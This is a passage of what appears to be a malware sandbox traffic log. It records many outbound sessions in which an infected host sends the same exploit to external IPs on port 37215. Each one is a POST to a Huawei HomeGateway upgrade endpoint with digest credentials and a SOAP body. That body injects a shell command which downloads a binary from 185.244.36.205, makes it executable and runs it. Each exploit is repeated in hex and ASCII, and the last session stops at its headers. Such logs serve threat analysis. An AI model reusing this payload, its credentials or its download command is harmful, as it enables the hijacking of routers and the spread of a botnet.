                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1825192.168.2.1548698156.69.127.24637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947455883 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1826192.168.2.1541316190.144.83.15937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947484970 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1827192.168.2.1551942156.237.110.7037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947503090 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1828192.168.2.1559568156.38.5.18637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947542906 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1829192.168.2.155409437.139.162.23237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947551012 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1830192.168.2.155432637.189.147.16437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947562933 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1831192.168.2.1553170157.177.215.9137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947585106 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1832192.168.2.1537788122.160.147.6637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947614908 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1833192.168.2.1535162122.11.44.237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947638035 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1834192.168.2.153623245.102.237.22137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947648048 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1835192.168.2.1539712156.169.95.17237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947669029 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
